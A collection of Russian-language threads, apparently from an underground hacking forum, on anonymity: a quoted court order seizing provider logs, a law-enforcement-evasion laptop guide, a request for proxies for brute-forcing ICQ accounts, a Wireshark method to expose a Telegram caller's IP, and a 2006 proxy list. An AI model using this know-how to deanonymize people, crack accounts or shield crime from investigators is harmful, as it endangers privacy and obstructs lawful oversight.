Разрешить старшему следователю СУ ГУ ЧП в Винницкой области капитану полиции Солодун Диане Витальевне на временный доступ, выемку надлежащим образом заверенных копий документов провайдера связи, сервер которого физически находится в Королевстве Нидерланды, а именно информации о пользователях (юридического, физического лица) каким было предоставлено в пользование IP - адрес: НОМЕР_3, с указанием IP-- адресов, которые использовались для входа в панель управления с отображением точного времени входа, номеров телефонов, электронных почтовых ящиков, логинов, мен, регистрационных данных, которые были указаны при получении услуги, а также реквизитов банковских, электронных платежных систем, используемых для оплаты получении услуги.

В случае невыполнения данного постановления суда по ходатайству стороны уголовного производства, которому предоставлено право на доступ к вещам и документам, суд вправе вынести постановление о проведении обыска с целью отыскания и изъятия указанных вещей и документов.

Решение суда остается в силе в течение одного месяца со дня его принятия.

Постановление следственного судьи является окончательным и обжалованию не подлежит.

Click to expand...

Итого:
Не надо строить иллюзий и верить всякой хyйне написанной на сайтах почтовых, VPN сервисов и т.д. - "полная ононимность, вы в безопасности, логов не храним, юрисдикция ояeбy кокая"
Все хранят, все сдадут :eek:

Хочу обратить внимание, это не дело о терроризме, о торговле кокаином, обычное вымогательство, связанное с похищением и то аж на раз-два-три сдали, что говорить о других событиях

Хотя, нужно признать, что они и не указывают нигде про хранение логов, о невозможности предоставить такие данные, скромно умалчивают о первом и мудрено говорят о втором вперемешку с кокими-то неюрисдикциями СШA и Евросоюза

В реале эта неюрисдикция звучит так: любой следак Усть-Залупинского района в любой стране пишет постановление, подписывает у судьи и шлет иво в Швейцарию. А оттудово, из этой неприступной конфиденциальной страны приходят логи...

Где взять прокси для брута ICQ?

ID: 676533bbb4103b69df371dd8
Thread ID: 15025
Created: 2008-05-06T14:58:35+0000
Last Post: 2008-12-04T12:56:01+0000
Author: jimma
Replies: 9 Views: 8K

Господа модераторы. Не сочтите за рекламу. Я занимаюсь, брутом ICQ (взломом ICQ)Просто я как новичёк, больше привык к покупке листов Прокси, чем достовать их самому. Продают прокси, разные, дорогие, нормальные, ватные...
Я просто хочу чтобы каждый написал где продают нормальные Списки, или ссылки на хорошие халявные ))
Мои варианты:

asechka.ru - прокси супер, но дорогие..., но зато можно скачать немного холявных.
2)Здесь _http://freeproxy.ru. Как попадешь, бывают, всё работает супер... а, бывает из 50 работало 6 )) Деньги просил обратно, не вернул. Гад.
Раньше брал здесь, _http://proxyz.su, нормальные, бывают плохие но парень с радостью возвращает деньги )))
4)Последнее время беру здесь _http://supericq.ru. Пока нравиться. Но обновляет редко, раз в сутки, иногда чуть почаще.
Ну и конечно не могу не припомнить _http://www.vo4tap.info. Но к сожелению он пока продажу забросил. :bang:

Полная информация о посетителе сайта

ID: 676533bbb4103b69df371dcf
Thread ID: 17318
Created: 2009-04-05T20:32:21+0000
Last Post: 2009-05-24T08:21:22+0000
Author: lisa99
Replies: 24 Views: 7K

Подскажите, плз..
где подробней написано и получше о получении инфы о каждом посетителе сайта
-айпи, юзерагент, ОС, разрешение экрана, referrer..и что еще?
- варианты подмены данных со стороны посетителя
и тп..

Удобная анонимность на практике.

ID: 676533bbb4103b69df3718f5
Thread ID: 112734
Created: 2024-04-17T13:54:38+0000
Last Post: 2024-11-29T19:10:28+0000
Author: infra
Prefix: Статья
Replies: 50 Views: 7K

Гайд, как сделать себе анонимную рабочую машину.

У меня как-то не заладилось с виртуальными машинами, не нравится с них работать. То скролл лагает, то производительность не такая. Люблю удобство без мозгоебства. Ютубчик там например на фоне крутить. Поэтому у нас будет голое железо, как у олдскулов в 95-м.

Для начала нам нужна сама рабочая машина. Чистая, где никакие железные идентификаторы не связаны с вашей личной белой жизнью. Поэтому идете и покупаете комп/ноут. Именно идете и покупаете, никаких онлайн-заказов, доставок и оплат картой. Ножками топаете и платите наличкой. Б\У брать допускается, только если вы не созванивались с продавцом при покупке и он вам не знаком никак. На этом этапе вам надо не оставить никаких цифровых следов покупки. Это не паранойя, пока вы спите, бигдата качается.

Далее нам нужен роутер с встроенным Tor. Это будет наш аналог Whonix или Tails, только железный. Ядро нашей анонимности. Для желающих ~~поебаться~~ порукоделить можно взять любой достаточно мощный роутер, прошить его OpenWRT и настроить там Tor. Гайды в инете есть. Для остальных сразу купить готовый. Есть вот такие https://www.gl-inet.com/ (не реклама), Tor там включается одной кнопкой. Есть и другие, поделки на малинке и много чего еще. Купить все это можно на Али, Авито, Ебэе, найдете в инете.

Сразу отключите Wi-fi. И на роутере и на ноуте. На ноуте его лучше физически отключить. Откручиваете заднюю панель и вытаскиваете модуль. Нужно это вот для чего. Если когда-нибудь вас пробьют сплойтом или какой-то софт отошлет телеметрию к себе, то там будет и MAC-адрес вашего Wi-fi. А включенный Wi-fi попадает в базы геолокации. Любая мобила шлет на свои сервера BSSID всех точек, которые видит. Ваша кстати далеко лежит? А еще в крупных городах по улицам ездят специальные машинки специальных служб, сканирующих эфир. Используйте старый добрый LAN-кабель.

Bluetooth туда же. В ноутах это чаще всего один модуль с Wi-Fi.

На роутере смените MAC-адрес LAN-интерфейса, включите TOR, подключайте чистый ноут и можно ставить ОС. После установки вы получите рабочую машину, которая о внешнем мире знает только измененный мак роутера, за которым TOR. ОС даже на свои сервера обновлений ни разу не сходила с вашего IP. Чистая анонимность.

Купите за монеро VPN. Оплачивайте не более чем на месяц, через месяц регистрируйте новый аккаунт, не связанный с прошлым. Не используйте приложение от VPN-сервиса, подключайте обычный OpenVPN-клиент. Приложение VPN шлет телеметрию, через которую свяжут ваши акки. Если у вас собственный VPN, то раз в месяц меняете сервер и аккаунт. Если берете у частных селлеров, то пишите с нового контакта. Кто скажет, почему это важно?

Если будете ставить Telegram, не используйте официальные билды. Возьмите опенсорсные форки. С другим софтом так же. Вместо Chrome - Chromium, VSCode - VSCodium. Любую телеметрию нахуй. И специальное персональное обновление вам не прогрузят.

В итоге вы получаете рабочее место, с которым можно просто удобно работать как за обычным компом. Не запуская виртуалки, не настраивая цепочки. Просто открыли крышку и работаете. Анонимность by design , 24/7.

В качестве ОС конечно лучше всего Linux. Если кому надо, в комментах подскажу, какие дистрибутивы лучше ставить. А вообще в эту схему можете подключать даже Windows, если вас не волнуют тонны телеметрии которые она собирает. Вай-фай главное отключите, он прямо приведет к вашей локации.

С этого ноута у вас не должно быть не малейшей связи с вашей личной жизнью. Наклейку например на него красную наклейте, для лишнего напоминания. Анонимный ноут - для анонимной деятельности. Не используете никакие учетки, которые вы использовали до того. Регаете все новое.

Если вам особая анонимность не нужна (ФБР и Интерпол вас искать не будут), то в этих же роутерах можете вместо TOR включить VPN. Kill Switch там есть. На основной машине тоже запускаете VPN (должны быть разными) и получаете дабл- впн. Это будет побыстрее, чем TOR. А при грамотном подборе VPN и локаций и не хуже по анонимности.

Из плюсов такого ноута - вам не страшны закладки в софте, гипервизоре, ОС, UEFI. Вся железка анонимна. Из минусов - любой софт с телеметрией видит железные идентификаторы. Поэтому строго соблюдаете советы выше.

Спасибо за внимание.

Телеграм представляет угрозу вашей анонимности

ID: 676533bbb4103b69df37190b
Thread ID: 119135
Created: 2024-07-18T17:44:57+0000
Last Post: 2024-11-10T17:41:27+0000
Author: MoonfrostTyrant
Prefix: Статья
Replies: 36 Views: 7K

**Добрый день, я нашел платформу, которая сохраняет ВСЕ и дает доступ к этой платформе правоохранительным и спецслужбам.

Платформа позволяет проводить поиск и анализ данных по различным параметрам, включая:**

имени пользователя, ключевым словам, доменам, email адресам, криптовалютным кошелькам, файлам, изображениям, IP-адресам, GPS-информации, персональным данным, данным из социальных сетей и историческим данным.

**Но сегодня мы поговорим только о Telegram на этой платформе.

Если вы введете свое имя пользователя, оно покажет вам информацию вашего профиля, сохраненную некоторое время назад. Он также сохраняет аву, которая у вас была раньше.
Пример ниже:**

Он также ищет каналы, в заголовке или ссылке которых упоминается ваше имя пользователя.
Например:

И да, оно сохраняет ВСЕ сообщение во ВСЕ каналы и группы. В том числе файлы, картинки, сообщения, и т.д. Нету разницы если вы удалите сообщения или нет, они уже сохранены.

он также может искать сообщения в каналах и группах в поисках упоминаний, включая ваше имя пользователя.

на этой платформе также есть визуализация, где вы можете сложить информацию и создать визуальный полный анализ.

Я хочу этим сказать, что ВСЕ сообщения в группах и каналах сохраняются. И не имеет значения, удалили ли вы когда-нибудь сообщение, ведь оно уже сохранено.

Пожалуйста, будьте осторожны и следите за тем, что говорите.

(Платформа дает бесплатную подписку правоохранительным органам.)

Когда правоохранительные органы запрашивают информацию через EDR (Emergency Data Request), Telegram предоставляет данные, такие как:

Информация об учетной записи (имя пользователя, номер телефона, профильная информация)
Данные переписок (сообщения, текст, изображения, видео, файлы и другие медиа)
Метаданные (временные метки сообщений, идентификаторы сообщений, информация об отправителе/получателе)
Информация о групповых чатах (списки участников, сообщения, административные действия)
Данные о звонках (временные метки и информация о звонящих)
IP-адреса (логи IP-адресов, используемых для доступа к аккаунтам)
Сеансы входа (даты, время и информация об устройствах)
Контакты (списки контактов, сохраненные в аккаунте Telegram)
Данные о каналах (посты, подписчики, административные действия)
Данные о местоположении (если включены)
Данные об взаимодействии с ботами
Данные о стикерах и GIF
Настройки аккаунта
Финансовые транзакции (если применимо)

В Росси начнут блокировать всё

ID: 676533bbb4103b69df3719bf
Thread ID: 99938
Created: 2023-10-12T14:14:47+0000
Last Post: 2024-01-24T23:04:02+0000
Author: RedDragon
Replies: 83 Views: 7K

В России начались закупки технологий для блокировки YouTube, WhatsApp, Telegram, VPN и других сервисов, сообщает СМИ, которое нельзя называть. Блокировки планируются по протоколу через систему глубокой фильтрации трафика (DPI) Обойти ее будет практически невозможно.

Это что начинается? Мы теперь таки будем как Китайцы под куполом и при попытке обойти фаервол залетим под штраф?

Утренний кофе для ПК

ID: 676533bbb4103b69df3719d9
Thread ID: 81875
Created: 2023-02-13T10:56:59+0000
Last Post: 2023-12-02T01:22:23+0000
Author: Stupor
Replies: 83 Views: 7K

" Береженого - Бог бережет"
(народная пословица)

Так как я являюсь разработчиком некоторых приватных решений в области типа кибербезопасности, то каждый запуск моего рабочего ПК я начинаю с обеспечения собственной безопасности.
Для своей деятельности я использую Windows и Kali Linux, установленную на Hiper-V, а так же все версии Windows и Linux всех разрядностей, установленных на Virtual Box для тестирования своего и стороннего софта.
Думаю не нужно говорить о том, что на хост системе Windows (x64 Windows 11) удалено всё лишнее, в том числе и встроенный Win Defender.
Для безопасности, более-менее безболезненной для производительности, я использую шифрованную EFS на всех дисках и поверх этого Bitlocker, а также автоматическое удаление файла подкачки при выключении и перезагрузке.
Но кроме того, для обеспечения сетевой безопасности своего ПК я использую каждый раз при его включении некоторые ухищрения, причем делаю это на половину вручную, что бы убедиться, что все в порядке.

1. Сеть при загрузке всегда отключена;
2. После запуска и входа в систему (а так же перед выходом) я проверяю автозагрузку утилитой Autoruns, используя как х86, так и х64 её версии;
3. Проверяю запущеные процессы утилитой [Process Explorer](https://learn.microsoft.com/ru-ru/sysinternals/downloads/process- explorer), убеждаюсь что все неподписанные и не проверенные процессы - те что и были;
4. Включаю сеть, проверяю сетевую активность при помощи Tcpview;
5. Запускаю TMAC, для изменения MAC-адреса;
6. Запускаю AdwCleaner, да так уж у меня сложилось, что я его использую для проверок;
7. Для того чтобы закрыть шары на компьютере, выполняем в скрипте последовательно:
"net share" - видим, что открыта шара самбы IPC$ - эта шара всегда появляется после запуска, (это можно пофиксить через групповые политики безопасности, но её же мог какой то софт втихую открыть), остальные типа C$, D$ и т.д. - расшареные диски, которые всегда встроены в систему изначально, мною давно пофикшены и здесь упоминать о них не буду);
8. Далее закрываем шару IPS$: "net share IPC$ /delete";
9. На всякий случай далее в скрипте выполняется "net share Users /delete";
10. Потом полностью очищаем кэш DNS: "ipconfig /flushdns";
11. Запуск WireGuard с приобретенными и надёжными туннелями, либо VPN->TOR, в зависимости от задач,
на текущий день.

Не забываем при отключении подчищать весь мусор, например, используя CCleaner.

Можно посчитать это параноидальной фигнёй, но лучше потратить лишние 5 минут за своим ПК, чем потом годы за #.

Как деанонят Telegram

ID: 676533bbb4103b69df371c5a
Thread ID: 44662
Created: 2020-11-22T18:07:08+0000
Last Post: 2021-01-17T12:27:28+0000
Author: Tubu
Prefix: Статья
Replies: 32 Views: 7K

Распишем Вам как делают деанон через телеграмм. И как защитить себя от этого. Поехали
Без iplogger'ов и прочего. Только звонок, телеграм и wireshark

Инструкция:

Качаем https://www.wireshark.org/download.html
Нажимаем на "лупу" (Найти пакет) и видим, как у нас появится новая строка с параметрами и поисковой строкой. Там выбираем параметр Строка

В строке пишем: XDR-MAPPED-ADDRESS

Включаем wireshark и звоним через Telegram. Как только пользователь ответит на звонок, тут же у нас начнут отображаться данные и среди них будет IP адрес юзера, которому звонили.

Чтобы понять, какой именно IP нам нужен, жмём уже в настроенном поисковике Найти , ищем в строке XDR-MAPPED-ADDRESS а то, что идёт после него и есть нужный нам IP.

Используйте с умом. Или не используйте, но хотя бы обезопасьте себя, отключив возможность принимать звонки в настройках, или перенеся все "важные" разговоры в секретные чаты.

Какой VPN используешь?

ID: 676533bbb4103b69df371c62
Thread ID: 42356
Created: 2020-09-22T08:00:31+0000
Last Post: 2020-12-29T21:08:01+0000
Author: What So Not
Replies: 54 Views: 7K

oVPN
Mulvad (про*бал ключ, поэтому перешел на oVPN)

Как обойти защиту

ID: 676533bbb4103b69df371d0d
Thread ID: 32853
Created: 2019-10-31T08:29:04+0000
Last Post: 2019-11-15T15:46:15+0000
Author: IHYS
Replies: 22 Views: 7K

Ребят кто может подсказать, как обойти защиту на любом пк при любом антивирусе.?

вопрос по деанонимизации или чтото на подобии этого

ID: 676533bbb4103b69df371d1e
Thread ID: 32360
Created: 2019-10-08T17:28:29+0000
Last Post: 2019-10-12T15:21:12+0000
Author: AEIOU
Replies: 50 Views: 7K

короче говоря есть такая практика где человека деанонимизируют по выходам из сайтов? (к примеру вышел с одного форума в котором был зарегестрирован и тут же появился на другом хоть и используеш ты к примеру тор и при переходе с одного сайта на другой нажимаеш на опцию Новая личность)
я имею в виду что вот именно в промежутке межуд выходом и входом на сайт (типо слишком резко или чтото такое) и типо не важно другой там айпи или чтото на поодобии или нет
просто думаю что частые переходы с одного на другой сайт (типо из дня в день каждый раз один человек приходит на сайт и как только с него уходит то тут же появляется типо человек на другом сайте но уже хоть и типо другой человек) могут деанонимизировать или типо того

Whonix + Sphere

ID: 676533bbb4103b69df371d69
Thread ID: 27851
Created: 2019-02-13T20:10:13+0000
Last Post: 2019-02-26T06:05:49+0000
Author: 4orthy7eventh
Replies: 21 Views: 7K

Добрый вечер , хотел бы узнать у знающих людей по поводу ОС Whonix , можно ли скачать и запустить браузер «Sphere”(не реклама ) , если можно то как ?
Пробывал качать wine и mono dev, но всё в пустую .

Хорошое VPN

ID: 676533bbb4103b69df371da6
Thread ID: 21064
Created: 2011-02-01T06:48:00+0000
Last Post: 2014-04-28T23:36:21+0000
Author: kururugi
Replies: 28 Views: 7K

Скажите пожалуйста вас опыт с ВПН. С того что читаль здес. мне выходит что хороший есть doublevpn.com.

Ест у вас с ним опыт? Или порекомендируете какой то другой ВПН сервис?

Спасибо

Сузаку

VPN

ID: 676533bbb4103b69df371dc2
Thread ID: 19128
Created: 2010-03-08T14:01:27+0000
Last Post: 2010-10-08T13:20:13+0000
Author: Империал
Replies: 35 Views: 7K

Здравствуйте всем! Я новенький!
Хочу обсудить ВПН. Понимаю, что эту тему обсуждали уже неоднократно, но все таки...
Вот объясните мне принцип действия впн!
И вообще нужен ил впн простому юзеру, который ничем противоправным не занимаеться?
Дело в этом что это далеко не дешевое удовольствие (по крайней мере для меня)
Существют ли бесплатные впн сервисы или ещекакая нить альтернатива?
Прокси не предлагать так как это не то!
Каким образом можно обеспечить хотя бы относительную анонимность в сети, без материалных затрат?

Коллекция прокси + названия стран

ID: 676533bbb4103b69df371dfd
Thread ID: 9077
Created: 2006-06-08T20:17:42+0000
Last Post: 2006-06-09T07:29:53+0000
Author: Чёрт
Replies: 5 Views: 7K

193.194.69.148:80 anonymous Algeria (Algiers)
190.48.64.60:3128 elite proxy Argentina (Buenos Aires)
190.48.64.60:8080 elite proxy Argentina (Buenos Aires)
190.48.8.74:6588 elite proxy Argentina (Buenos Aires)
200.55.75.114:6588 elite proxy Argentina (Buenos Aires)
200.80.233.66:80 anonymous Argentina (Buenos Aires)
24.232.203.205:6588 elite proxy Argentina (Buenos Aires)
62.116.40.112:80 elite proxy Austria (Wien)
212.35.114.108:8080 anonymous Belgium (Brussels)
201.17.154.220:6588 elite proxy Brazil (Belo Horizonte)
201.17.170.77:6588 elite proxy Brazil (Belo Horizonte)
201.17.172.12:6588 elite proxy Brazil (Belo Horizonte)
201.17.176.104:6588 elite proxy Brazil (Belo Horizonte)
201.17.180.187:6588 elite proxy Brazil (Belo Horizonte)
201.6.197.167:8080 elite proxy Brazil (Belйm)
200.101.236.1:6588 elite proxy Brazil (Brasнlia)
200.102.213.205:6588 elite proxy Brazil (Brasнlia)
200.96.91.210:6588 elite proxy Brazil (Brasнlia)
201.25.98.50:6588 elite proxy Brazil (Brasнlia)
200.142.179.252:6588 elite proxy Brazil (Natal)
201.55.111.171:6588 elite proxy Brazil (Natal)
200.176.229.236:6588 elite proxy Brazil (Porto Alegre)
201.6.108.124:6588 elite proxy Brazil (Porto Alegre)
200.101.68.129:80 anonymous Brazil (Rio De Janeiro)
200.101.68.134:80 anonymous Brazil (Rio De Janeiro)
200.213.54.64:8080 anonymous Brazil (Rio De Janeiro)
201.12.36.137:6588 elite proxy Brazil (Rio De Janeiro)
201.17.51.81:6588 elite proxy Brazil (Rio De Janeiro)
201.23.147.14:6588 elite proxy Brazil (Rio De Janeiro)
201.36.106.19:6588 elite proxy Brazil (Rio De Janeiro)
200.172.88.194:6588 elite proxy Brazil (Sгo Josй Dos Campos)
200.185.247.169:8080 elite proxy Brazil (Sгo Paulo)
201.17.147.140:6588 elite proxy Brazil (Sгo Paulo)
201.17.202.71:6588 elite proxy Brazil (Sгo Paulo)
201.17.202.74:6588 elite proxy Brazil (Sгo Paulo)
201.17.207.69:6588 elite proxy Brazil (Sгo Paulo)
201.17.214.172:6588 elite proxy Brazil (Sгo Paulo)
201.17.235.26:6588 elite proxy Brazil (Sгo Paulo)
201.17.244.119:6588 elite proxy Brazil (Sгo Paulo)
201.20.193.248:6588 elite proxy Brazil (Sгo Paulo)
201.21.7.69:8080 elite proxy Brazil (Sгo Paulo)
201.21.83.115:6588 elite proxy Brazil (Sгo Paulo)
201.21.92.88:6588 elite proxy Brazil (Sгo Paulo)
201.28.121.74:6588 elite proxy Brazil (Sгo Paulo)
201.37.30.74:6588 elite proxy Brazil (Sгo Paulo)
200.209.175.241:6588 elite proxy Brazil
201.30.93.50:6588 elite proxy Brazil
201.38.143.216:6588 elite proxy Brazil
201.44.218.77:6588 elite proxy Brazil
201.45.32.141:6588 elite proxy Brazil
88.80.134.221:3128 elite proxy Bulgaria (Cherven)
85.217.137.138:8080 elite proxy Bulgaria (Tarnovo)
206.82.130.210:80 elite proxy Burkina Faso(Ouagadougou)
68.146.56.38:80 elite proxy Canada (AB, Calgary)
64.180.252.105:8080 elite proxy Canada (BC, Burnaby)
207.216.68.252:8080 elite proxy Canada (BC, Steveston)
24.83.133.177:3128 elite proxy Canada (BC, Vancouver)
24.86.197.136:8080 elite proxy Canada (BC, Vancouver)
24.78.2.244:8000 anonymous Canada (MB, Saint James)
198.163.152.230:3128 elite proxy Canada (MB, Winnipeg)
24.222.145.186:7212 elite proxy Canada (NS, Halifax)
70.24.163.26:8080 elite proxy Canada (ON, Beamsville)
69.193.252.89:8080 elite proxy Canada (ON, London)
70.28.135.168:8080 elite proxy Canada (ON, London)
69.197.142.100:80 elite proxy Canada (ON, Toronto)
132.204.102.20:3128 elite proxy Canada (QC, Montrйal)
209.71.226.139:80 elite proxy Canada (QC, Quйbec)
200.104.194.45:6588 elite proxy Chile (Santiago)
200.120.121.63:6588 elite proxy Chile (Santiago)
200.126.72.36:8080 elite proxy Chile (Valdivia)
202.106.192.134:8080 elite proxy China (Beijing)
202.106.192.42:8080 elite proxy China (Beijing)
202.106.192.86:8080 elite proxy China (Beijing)
211.153.44.155:8080 anonymous China (Beijing)
211.97.20.10:3128 elite proxy China (Beijing)
218.249.47.173:80 elite proxy China (Beijing)
222.136.91.1:80 anonymous China (Beijing)
58.246.136.3:8080 elite proxy China (Beijing)
58.67.31.194:80 anonymous China (Guangzhou)
218.11.207.244:80 anonymous China (Hebei)
218.62.73.7:80 elite proxy China (Jilin)
58.15.156.37:8080 elite proxy China (Jinan)
219.144.196.226:80 anonymous China (Shaan)
218.56.148.74:8080 anonymous China (Shandong)
202.120.6.34:3128 elite proxy China (Shanghai)
202.158.165.82:80 elite proxy China (Shanghai)
211.136.107.75:80 anonymous China (Shanghai)
219.140.165.91:8080 anonymous China (Wuhan)
218.3.166.226:80 elite proxy China (Xuzhou)
218.56.32.230:8080 anonymous China (Yantai)
219.159.55.201:3128 elite proxy China
61.142.212.46:8080 anonymous China
200.21.132.146:6588 elite proxy Colombia (Bogotб)
200.21.245.222:6588 elite proxy Colombia (Bogotб)
200.93.183.106:8080 anonymous Colombia (Bogotб)
201.228.24.146:6588 elite proxy Colombia (Bogotб)
69.79.57.126:6588 elite proxy Colombia (Bogotб)
200.93.150.47:6588 elite proxy Colombia (Bucaramanga)
200.114.66.249:6588 elite proxy Colombia (Cali)
63.168.93.42:3128 elite proxy Colombia (Cundinamarca)
201.236.200.148:6588 elite proxy Colombia (Pereira)
200.122.132.182:8080 anonymous Costa Rica (San Josй)
212.158.130.155:80 anonymous Czech Republic (Praha)
80.167.199.111:8080 elite proxy Denmark (Rшdovre)
200.42.224.117:6588 elite proxy Dominican Republic (Santo Domingo)
200.107.36.218:80 elite proxy Ecuador (Quito)
201.247.147.204:6588 elite proxy El Salvador (San Salvador)
81.57.69.156:7212 elite proxy France (A2, Rennes)
84.4.6.72:80 anonymous France (A8, La Celle-Saint-Cloud)
80.15.183.166:80 anonymous France (A8, Neuilly)
80.65.232.102:80 elite proxy France (A8, Paris)
82.228.245.81:8000 elite proxy France (A8, Paris)
82.233.19.69:8080 elite proxy France (A8, Paris)
82.240.190.171:8080 elite proxy France (A8, Paris)
213.41.192.186:80 anonymous France (A8, Versailles)
80.170.43.107:8080 elite proxy France (B2, Flavigny-sur-Moselle)
213.30.169.224:8080 elite proxy France (B4, Lille)
62.244.112.6:8000 anonymous France (B6, Compiиgne)
82.229.216.15:8080 elite proxy France (B7, Poitiers)
82.234.138.4:80 anonymous France (B9, Lyon)
141.14.139.166:80 elite proxy Germany (Berlin)
130.83.160.199:3128 elite proxy Germany (Darmstadt)
141.12.12.72:80 elite proxy Germany (Darmstadt)
80.237.140.233:80 elite proxy Germany (Koeln)
80.237.171.24:3128 elite proxy Germany (Koeln)
83.236.175.146:80 elite proxy Germany (Koeln)
85.220.135.72:3128 anonymous Germany (Minden)
145.253.125.130:80 elite proxy Germany (Oberhausen)
200.49.177.148:8080 anonymous Guatemala (El Salvador)
205.240.206.143:7212 elite proxy Honduras (San Pedro Sula)
61.238.244.86:3128 elite proxy Hong Kong (Hong Kong)
203.193.48.3:8080 elite proxy Hong Kong (Sheung Shui)
218.248.1.13:8080 anonymous India (New Delhi)
59.94.224.39:6588 elite proxy India (New Delhi)
61.247.229.101:80 elite proxy India (New Delhi)
221.134.83.43:8080 anonymous India
81.12.96.173:3128 elite proxy Iran, Islamic Republic of (Tehran)
208.161.242.74:8080 elite proxy Ireland (Dublin)
208.161.242.74:80 elite proxy Ireland (Dublin)
132.67.8.66:80 anonymous Israel (Tel Aviv)
85.33.152.36:8000 anonymous Italy (Carrara)
81.208.62.251:80 anonymous Italy (Nogara)
87.2.218.70:6588 elite proxy Italy (Vicenza)
210.148.120.125:8080 elite proxy Japan (Asahikawa)
61.120.143.110:8080 elite proxy Japan (Suzuka)
219.164.244.202:8080 elite proxy Japan (Tokyo)
219.197.8.207:8080 elite proxy Japan (Tokyo)
219.200.84.28:80 elite proxy Japan (Tokyo)
220.158.22.120:80 elite proxy Japan (Tokyo)
220.25.236.66:8080 elite proxy Japan (Tokyo)
220.4.136.196:8080 elite proxy Japan (Tokyo)
220.62.184.107:8080 elite proxy Japan (Tokyo)
221.247.245.181:80 elite proxy Japan (Tokyo)
221.254.57.45:8080 elite proxy Japan (Tokyo)
222.151.197.130:80 elite proxy Japan (Tokyo)
61.121.113.202:8080 anonymous Japan (Tokyo)
211.133.230.127:8080 elite proxy Japan
211.135.116.223:80 elite proxy Japan
218.112.86.74:8080 elite proxy Japan
218.179.105.1:8080 elite proxy Japan
219.103.160.214:8080 elite proxy Japan
219.110.58.59:8080 elite proxy Japan
219.122.121.194:8080 elite proxy Japan
219.40.128.190:8080 elite proxy Japan
219.51.134.123:8080 elite proxy Japan
220.208.103.134:8080 elite proxy Japan
221.17.80.153:8080 elite proxy Japan
221.85.169.46:8080 elite proxy Japan
58.12.5.106:80 elite proxy Japan
58.4.97.173:8080 elite proxy Japan
59.156.109.47:80 elite proxy Japan
61.24.156.194:8080 elite proxy Japan
212.116.225.202:8080 anonymous Kazakstan (Almaty)
220.69.240.122:8080 elite proxy Korea, Republic of (Andong)
210.126.93.45:8080 elite proxy Korea, Republic of (Cheju)
218.149.173.5:8080 elite proxy Korea, Republic of (Cheju)
221.162.12.44:8080 elite proxy Korea, Republic of (Cheju)
210.91.235.70:8080 elite proxy Korea, Republic of (Chungnam)
211.199.105.174:8080 elite proxy Korea, Republic of (Chungnam)
211.115.235.18:8080 elite proxy Korea, Republic of (Hogye)
219.240.113.2:8080 elite proxy Korea, Republic of (Inchon)
220.126.50.226:8080 elite proxy Korea, Republic of (Inchon)
222.100.63.25:50050 elite proxy Korea, Republic of (Inchon)
210.118.141.134:8080 elite proxy Korea, Republic of (Jinhae)
210.114.144.21:8080 elite proxy Korea, Republic of (Kumi)
61.111.74.158:8080 elite proxy Korea, Republic of (Kumi)
168.131.73.249:8080 elite proxy Korea, Republic of (Kwangju)
61.84.231.156:8080 elite proxy Korea, Republic of (Kwangju)
221.165.200.197:50050 elite proxy Korea, Republic of (Naedong)
218.38.200.109:8080 elite proxy Korea, Republic of (Pusan)
218.55.222.195:8080 elite proxy Korea, Republic of (Pusan)
220.95.73.118:8080 elite proxy Korea, Republic of (Pusan)
219.241.25.92:50050 elite proxy Korea, Republic of (Seocho)
128.134.202.175:8080 elite proxy Korea, Republic of (Seoul)
128.134.202.187:8080 elite proxy Korea, Republic of (Seoul)
128.134.57.150:8080 elite proxy Korea, Republic of (Seoul)
202.133.19.151:8080 elite proxy Korea, Republic of (Seoul)
202.136.135.249:8080 elite proxy Korea, Republic of (Seoul)
203.236.112.122:50050 elite proxy Korea, Republic of (Seoul)
203.252.152.98:8080 elite proxy Korea, Republic of (Seoul)
203.252.165.184:8080 elite proxy Korea, Republic of (Seoul)
210.101.138.153:8080 elite proxy Korea, Republic of (Seoul)
210.113.11.209:8080 elite proxy Korea, Republic of (Seoul)
210.123.37.223:8080 elite proxy Korea, Republic of (Seoul)
210.183.42.18:50050 elite proxy Korea, Republic of (Seoul)
211.187.34.124:50050 elite proxy Korea, Republic of (Seoul)
211.189.86.240:50050 elite proxy Korea, Republic of (Seoul)
211.203.239.172:50050 elite proxy Korea, Republic of (Seoul)
211.204.84.56:50050 elite proxy Korea, Republic of (Seoul)
211.205.186.190:50050 elite proxy Korea, Republic of (Seoul)
211.207.111.84:8080 elite proxy Korea, Republic of (Seoul)
211.208.231.128:8080 elite proxy Korea, Republic of (Seoul)
211.211.165.25:8080 elite proxy Korea, Republic of (Seoul)
211.212.35.74:50050 elite proxy Korea, Republic of (Seoul)
211.51.30.183:8080 elite proxy Korea, Republic of (Seoul)
218.146.9.124:8080 elite proxy Korea, Republic of (Seoul)
218.152.77.153:8080 elite proxy Korea, Republic of (Seoul)
218.232.149.156:8080 elite proxy Korea, Republic of (Seoul)
218.236.133.158:8080 elite proxy Korea, Republic of (Seoul)
218.237.111.188:8080 elite proxy Korea, Republic of (Seoul)
218.38.165.177:8080 elite proxy Korea, Republic of (Seoul)
218.49.214.62:50050 elite proxy Korea, Republic of (Seoul)
218.53.241.71:8080 elite proxy Korea, Republic of (Seoul)
219.240.79.62:8080 elite proxy Korea, Republic of (Seoul)
219.251.115.209:8080 elite proxy Korea, Republic of (Seoul)
220.117.151.60:8080 elite proxy Korea, Republic of (Seoul)
220.72.55.166:8080 elite proxy Korea, Republic of (Seoul)
220.76.231.43:8080 elite proxy Korea, Republic of (Seoul)
220.85.39.154:8080 elite proxy Korea, Republic of (Seoul)
220.86.99.122:8080 elite proxy Korea, Republic of (Seoul)
220.90.158.38:8080 elite proxy Korea, Republic of (Seoul)
221.138.108.229:50050 elite proxy Korea, Republic of (Seoul)
221.139.207.34:50050 elite proxy Korea, Republic of (Seoul)
221.142.245.144:8080 anonymous Korea, Republic of (Seoul)
221.145.21.170:8080 elite proxy Korea, Republic of (Seoul)
221.145.27.75:50050 elite proxy Korea, Republic of (Seoul)
221.146.137.54:8080 elite proxy Korea, Republic of (Seoul)
221.146.138.161:8080 elite proxy Korea, Republic of (Seoul)
221.146.211.193:8080 elite proxy Korea, Republic of (Seoul)
221.149.64.157:8080 elite proxy Korea, Republic of (Seoul)
221.150.82.68:8080 elite proxy Korea, Republic of (Seoul)
222.109.41.226:50050 elite proxy Korea, Republic of (Seoul)
222.112.15.80:8080 elite proxy Korea, Republic of (Seoul)
222.112.15.99:8080 elite proxy Korea, Republic of (Seoul)
222.233.150.242:8080 elite proxy Korea, Republic of (Seoul)
222.234.249.72:8080 elite proxy Korea, Republic of (Seoul)
222.235.157.210:8080 elite proxy Korea, Republic of (Seoul)
222.235.43.171:8080 elite proxy Korea, Republic of (Seoul)
222.236.122.75:8080 elite proxy Korea, Republic of (Seoul)
